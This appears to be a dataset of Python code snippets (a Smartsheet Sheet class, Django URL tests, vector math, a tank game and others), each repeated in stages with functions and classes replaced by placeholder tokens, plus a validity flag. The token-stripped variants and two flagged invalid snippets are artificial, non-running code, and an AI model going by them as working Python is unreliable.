"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n <function token>\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n <function token>\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n <function token>\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n <function token>\n <function token>\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n <function token>\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n<class token>\n"
] | false |
99,852 | 62de685cd20177acb37fa3b6903469deb998c566 | import bacon
class Game(bacon.Game):
def on_tick(self):
bacon.clear(0, 0, 0, 1)
def on_mouse_button(self, button, pressed):
print('bacon.MouseButtons.%s was %s' % (bacon.MouseButtons.tostring(button), 'pressed' if pressed else 'released'))
bacon.run(Game()) | [
"import bacon\n\nclass Game(bacon.Game):\n def on_tick(self):\n bacon.clear(0, 0, 0, 1)\n\n def on_mouse_button(self, button, pressed):\n print('bacon.MouseButtons.%s was %s' % (bacon.MouseButtons.tostring(button), 'pressed' if pressed else 'released'))\n\nbacon.run(Game())",
"import bacon\n\n\nclass Game(bacon.Game):\n\n def on_tick(self):\n bacon.clear(0, 0, 0, 1)\n\n def on_mouse_button(self, button, pressed):\n print('bacon.MouseButtons.%s was %s' % (bacon.MouseButtons.tostring\n (button), 'pressed' if pressed else 'released'))\n\n\nbacon.run(Game())\n",
"<import token>\n\n\nclass Game(bacon.Game):\n\n def on_tick(self):\n bacon.clear(0, 0, 0, 1)\n\n def on_mouse_button(self, button, pressed):\n print('bacon.MouseButtons.%s was %s' % (bacon.MouseButtons.tostring\n (button), 'pressed' if pressed else 'released'))\n\n\nbacon.run(Game())\n",
"<import token>\n\n\nclass Game(bacon.Game):\n\n def on_tick(self):\n bacon.clear(0, 0, 0, 1)\n\n def on_mouse_button(self, button, pressed):\n print('bacon.MouseButtons.%s was %s' % (bacon.MouseButtons.tostring\n (button), 'pressed' if pressed else 'released'))\n\n\n<code token>\n",
"<import token>\n\n\nclass Game(bacon.Game):\n\n def on_tick(self):\n bacon.clear(0, 0, 0, 1)\n <function token>\n\n\n<code token>\n",
"<import token>\n\n\nclass Game(bacon.Game):\n <function token>\n <function token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<code token>\n"
] | false |
99,853 | c77dbcde2d4bda000a4d813c0a7acc92fb4c6c77 | #!/usr/bin/python
# extract the function args from url query parameters to create function args itemset
from urlparse import urlparse
import sys
def pathsplit(x): return x.split('/')
def argsplit(x): return x.split('=')
def argname(x): return len(x) == 2 and x[0] + "= " + x[1] + "&" or x[0] + "="
def pathname(x): return x and x + "/"
for line in sys.stdin:
url = urlparse(line.rstrip('\n'))
if url.scheme == "http":
if url.query != "":
print ' '.join(map (pathname, url.path.split("/"))) + ' ' + ' '.join(map (argname, map(argsplit, url.query.split("&"))))
else:
print ' '.join(map (pathname, url.path.split("/")))
| [
"#!/usr/bin/python\n\n# extract the function args from url query parameters to create function args itemset\n\nfrom urlparse import urlparse\nimport sys\n\ndef pathsplit(x): return x.split('/')\ndef argsplit(x): return x.split('=')\ndef argname(x): return len(x) == 2 and x[0] + \"= \" + x[1] + \"&\" or x[0] + \"=\"\ndef pathname(x): return x and x + \"/\"\n\nfor line in sys.stdin:\n url = urlparse(line.rstrip('\\n'))\n if url.scheme == \"http\":\n\tif url.query != \"\":\n print ' '.join(map (pathname, url.path.split(\"/\"))) + ' ' + ' '.join(map (argname, map(argsplit, url.query.split(\"&\"))))\n else:\n print ' '.join(map (pathname, url.path.split(\"/\")))\n\n"
] | true |
99,854 | 4e4cc9f84d8cbdcb255d067a946e8eece97512ab | from django.urls import resolve, reverse
class TestUrls:
def test_order_detail_url(self):
path = reverse('order-detail', kwargs={'order_id': 15})
assert resolve(path).view_name == 'order-detail'
def test_home_url(self):
path = reverse('coderslab-home')
assert resolve(path).view_name == 'coderslab-home'
def test_pipe_configurator_url(self):
path = reverse('coderslab-pipe_configurator')
assert resolve(path).view_name == 'coderslab-pipe_configurator'
def test_login_url(self):
path = reverse('login')
assert resolve(path).view_name == 'login'
def test_logout_url(self):
path = reverse('logout')
assert resolve(path).view_name == 'logout'
def test_register_url(self):
path = reverse('register')
assert resolve(path).view_name == 'register'
def test_rorder_list_url(self):
path = reverse('order-list')
assert resolve(path).view_name == 'order-list'
| [
"from django.urls import resolve, reverse\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n\n def test_pipe_configurator_url(self):\n path = reverse('coderslab-pipe_configurator')\n assert resolve(path).view_name == 'coderslab-pipe_configurator'\n\n def test_login_url(self):\n path = reverse('login')\n assert resolve(path).view_name == 'login'\n\n def test_logout_url(self):\n path = reverse('logout')\n assert resolve(path).view_name == 'logout'\n\n def test_register_url(self):\n path = reverse('register')\n assert resolve(path).view_name == 'register'\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n\n def test_pipe_configurator_url(self):\n path = reverse('coderslab-pipe_configurator')\n assert resolve(path).view_name == 'coderslab-pipe_configurator'\n\n def test_login_url(self):\n path = reverse('login')\n assert resolve(path).view_name == 'login'\n\n def test_logout_url(self):\n path = reverse('logout')\n assert resolve(path).view_name == 'logout'\n\n def test_register_url(self):\n path = reverse('register')\n assert resolve(path).view_name == 'register'\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n\n def test_pipe_configurator_url(self):\n path = reverse('coderslab-pipe_configurator')\n assert resolve(path).view_name == 'coderslab-pipe_configurator'\n <function token>\n\n def test_logout_url(self):\n path = reverse('logout')\n assert resolve(path).view_name == 'logout'\n\n def test_register_url(self):\n path = reverse('register')\n assert resolve(path).view_name == 'register'\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n\n def test_pipe_configurator_url(self):\n path = reverse('coderslab-pipe_configurator')\n assert resolve(path).view_name == 'coderslab-pipe_configurator'\n <function token>\n <function token>\n\n def test_register_url(self):\n path = reverse('register')\n assert resolve(path).view_name == 'register'\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n\n def test_pipe_configurator_url(self):\n path = reverse('coderslab-pipe_configurator')\n assert resolve(path).view_name == 'coderslab-pipe_configurator'\n <function token>\n <function token>\n <function token>\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n\n\nclass TestUrls:\n <function token>\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n\n\nclass TestUrls:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,855 | 1d2f2f31dff1352d06b9dad1eb24bb6b748bd09f | # Importer moduler
import math
# Definer funksjonene
def vektor(x, y, z): # Lager en liste av x,y,z koordinater
return [x, y, z]
def vecprint(vec): # Printer vektoren på en fin måte
print("vector =", vec)
# Returnerer en vektor som er den forrige vektoren ganget med en skalar
def scalar_multiplication(vec, scalar):
product = []
for i in range(0, len(vec)):
product.append(vec[i] * scalar)
return product
def length(vec, scalar): # Printer lengden av en vektor, lengden av vektoren etter skalarmulitplikasjonen og forholdet mellom de to
v2 = scalar_multiplication(vec, scalar)
l1sqrd = 0
l2sqrd = 0
for i in range(0, len(vec)):
l1sqrd += vec[i]**2
l2sqrd += v2[i]**2
print("Vektorlengde:", math.sqrt(l1sqrd))
print("Vektorlengde etter skalarmultiplikasjon:", math.sqrt(l2sqrd))
print("Forholdet mellom de to er:", math.sqrt(l2sqrd) / math.sqrt(l1sqrd))
return
def scalar_product(vec1, vec2): # Returnerer skalarproduktet av to vektorer
product = 0
for i in range(0, len(vec1)):
product += vec1[i] * vec2[i]
return product
# Definer initialbetingelser
scalar = float(input("Oppgi en valgfri skalar: "))
vec1 = vektor(1.5, 3.7, 4.5)
vec2 = scalar_multiplication(vec1, scalar)
vec3 = vektor(3.7, -1.5, 0)
# Kaller funksjonene
vecprint(vec2)
print()
length(vec1, scalar)
print()
print(scalar_product(vec1, vec3))
| [
"# Importer moduler\nimport math\n\n# Definer funksjonene\n\n\ndef vektor(x, y, z): # Lager en liste av x,y,z koordinater\n return [x, y, z]\n\n\ndef vecprint(vec): # Printer vektoren på en fin måte\n print(\"vector =\", vec)\n\n\n# Returnerer en vektor som er den forrige vektoren ganget med en skalar\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar): # Printer lengden av en vektor, lengden av vektoren etter skalarmulitplikasjonen og forholdet mellom de to\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i]**2\n l2sqrd += v2[i]**2\n print(\"Vektorlengde:\", math.sqrt(l1sqrd))\n print(\"Vektorlengde etter skalarmultiplikasjon:\", math.sqrt(l2sqrd))\n print(\"Forholdet mellom de to er:\", math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2): # Returnerer skalarproduktet av to vektorer\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\n# Definer initialbetingelser\nscalar = float(input(\"Oppgi en valgfri skalar: \"))\nvec1 = vektor(1.5, 3.7, 4.5)\nvec2 = scalar_multiplication(vec1, scalar)\nvec3 = vektor(3.7, -1.5, 0)\n\n\n# Kaller funksjonene\nvecprint(vec2)\nprint()\nlength(vec1, scalar)\nprint()\nprint(scalar_product(vec1, vec3))\n",
"import math\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\ndef vecprint(vec):\n print('vector =', vec)\n\n\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\nscalar = float(input('Oppgi en valgfri skalar: '))\nvec1 = vektor(1.5, 3.7, 4.5)\nvec2 = scalar_multiplication(vec1, scalar)\nvec3 = vektor(3.7, -1.5, 0)\nvecprint(vec2)\nprint()\nlength(vec1, scalar)\nprint()\nprint(scalar_product(vec1, vec3))\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\ndef vecprint(vec):\n print('vector =', vec)\n\n\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\nscalar = float(input('Oppgi en valgfri skalar: '))\nvec1 = vektor(1.5, 3.7, 4.5)\nvec2 = scalar_multiplication(vec1, scalar)\nvec3 = vektor(3.7, -1.5, 0)\nvecprint(vec2)\nprint()\nlength(vec1, scalar)\nprint()\nprint(scalar_product(vec1, vec3))\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\ndef vecprint(vec):\n print('vector =', vec)\n\n\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\n<assignment token>\nvecprint(vec2)\nprint()\nlength(vec1, scalar)\nprint()\nprint(scalar_product(vec1, vec3))\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\ndef vecprint(vec):\n print('vector =', vec)\n\n\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\n<assignment token>\n<code token>\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\n<function token>\n\n\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\n<assignment token>\n<code token>\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\n<function token>\n<function token>\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\n<assignment token>\n<code token>\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\n<function token>\n<function token>\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\n<function token>\n<assignment token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\n<function token>\n<assignment token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n"
] | false |
99,856 | 4d7c63585a214e58460f801a8255f12b22fa8f86 | # Access documentation with '?':
# All Python objects contain reference to their respecive docstrings.
# The docstring is simply a brief description of what the object/method does.
len?
help(len) # standard Python interface
L = [1, 2, 3]
L.insert?
L?
# The ? operator also works for functions we define ourselves.
def square(a):
"""Return the square of a."""
return a ** 2
help(square)
square?
# Accessing Source Code with '??':
# In addition to the docstring, ?? yields source code if available.
square??
# Objects without source code are usually implemented in C or another language.
len??
# Tab autocompletion work with wildcard character (*).
*Warning? # print all objects in namespace ending with Warning.
str.*find*? # print all str methods containing 'find' anywhere in name.
| [
"# Access documentation with '?':\n# All Python objects contain reference to their respecive docstrings.\n# The docstring is simply a brief description of what the object/method does.\nlen?\nhelp(len) # standard Python interface\n\nL = [1, 2, 3]\nL.insert? \nL? \n\n# The ? operator also works for functions we define ourselves.\ndef square(a):\n \"\"\"Return the square of a.\"\"\"\n return a ** 2\n\nhelp(square)\nsquare?\n\n# Accessing Source Code with '??':\n# In addition to the docstring, ?? yields source code if available.\nsquare??\n\n# Objects without source code are usually implemented in C or another language.\nlen??\n\n# Tab autocompletion work with wildcard character (*).\n*Warning? # print all objects in namespace ending with Warning.\nstr.*find*? # print all str methods containing 'find' anywhere in name.\n"
] | true |
99,857 | 5ce7213d5caa6ccf5f3a37b6c48d8966027601d2 | T = int(input())
def tank_command(s):
global H, W, tank_dir
if s == 'U':
if pos[0] > 0:
if board[pos[0] - 1][pos[1]] == '.':
board[pos[0]][pos[1]] = '.'
pos[0] -= 1
board[pos[0]][pos[1]] = '^'
tank_dir = '^'
elif s == 'D':
if pos[0] < H - 1:
if board[pos[0] + 1][pos[1]] == '.':
board[pos[0]][pos[1]] = '.'
pos[0] += 1
board[pos[0]][pos[1]] = 'v'
tank_dir = 'v'
elif s == 'R':
if pos[1] < W - 1:
if board[pos[0]][pos[1]+1] == '.':
board[pos[0]][pos[1]] = '.'
pos[1] += 1
board[pos[0]][pos[1]] = '>'
tank_dir = '>'
elif s == 'L':
if pos[1] > 0:
if board[pos[0]][pos[1]-1] == '.':
board[pos[0]][pos[1]] = '.'
pos[1] -= 1
board[pos[0]][pos[1]] = '<'
tank_dir = '<'
elif s == 'S':
if tank_dir == '>':
for i in range(pos[1] + 1, W):
if board[pos[0]][i] == '#':
break
elif board[pos[0]][i] == '*':
board[pos[0]][i] = '.'
break
elif tank_dir == '<':
for i in range(pos[1] - 1, -1, -1):
if board[pos[0]][i] == '#':
break
elif board[pos[0]][i] == '*':
board[pos[0]][i] = '.'
break
elif tank_dir == '^':
for i in range(pos[0] - 1, -1, -1):
if board[i][pos[1]] == '#':
break
elif board[i][pos[1]] == '*':
board[i][pos[1]] = '.'
break
elif tank_dir == 'v':
for i in range(pos[0] + 1, H):
if board[i][pos[1]] == '#':
break
elif board[i][pos[1]] == '*':
board[i][pos[1]] = '.'
break
data = ''
for tc in range(1, T + 1):
H, W = map(int, input().split())
board = []
for i in range(H):
board.append(list(input()))
tank_dir = ''
for i in range(W):
for j in range(H):
if board[j][i] in '><^v':
tank_dir = board[j][i]
pos = [j, i]
break
if tank_dir:
break
len_coms = int(input())
coms = input()
for com in coms:
tank_command(com)
ans = []
for line in board:
tmp = ''.join(line)
ans.append(tmp)
print(f'#{tc}', end=' ')
for each in ans:
print(each)
| [
"T = int(input())\n\n\ndef tank_command(s):\n global H, W, tank_dir\n\n if s == 'U':\n if pos[0] > 0:\n if board[pos[0] - 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] -= 1\n board[pos[0]][pos[1]] = '^'\n tank_dir = '^'\n elif s == 'D':\n if pos[0] < H - 1:\n if board[pos[0] + 1][pos[1]] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[0] += 1\n board[pos[0]][pos[1]] = 'v'\n tank_dir = 'v'\n elif s == 'R':\n if pos[1] < W - 1:\n if board[pos[0]][pos[1]+1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] += 1\n board[pos[0]][pos[1]] = '>'\n tank_dir = '>'\n elif s == 'L':\n if pos[1] > 0:\n if board[pos[0]][pos[1]-1] == '.':\n board[pos[0]][pos[1]] = '.'\n pos[1] -= 1\n board[pos[0]][pos[1]] = '<'\n tank_dir = '<'\n elif s == 'S':\n\n if tank_dir == '>':\n for i in range(pos[1] + 1, W):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '<':\n for i in range(pos[1] - 1, -1, -1):\n if board[pos[0]][i] == '#':\n break\n elif board[pos[0]][i] == '*':\n board[pos[0]][i] = '.'\n break\n elif tank_dir == '^':\n for i in range(pos[0] - 1, -1, -1):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n elif tank_dir == 'v':\n for i in range(pos[0] + 1, H):\n if board[i][pos[1]] == '#':\n break\n elif board[i][pos[1]] == '*':\n board[i][pos[1]] = '.'\n break\n\n\ndata = ''\nfor tc in range(1, T + 1):\n H, W = map(int, input().split())\n\n board = []\n for i in range(H):\n board.append(list(input()))\n\n tank_dir = ''\n for i in range(W):\n for j in range(H):\n if board[j][i] in '><^v':\n tank_dir = board[j][i]\n pos = [j, i]\n break\n if tank_dir:\n break\n\n len_coms = int(input())\n coms = input()\n\n for com in coms:\n tank_command(com)\n\n ans = []\n for line in board:\n tmp = ''.join(line)\n ans.append(tmp)\n\n print(f'#{tc}', end=' ')\n for each in ans:\n print(each)\n",
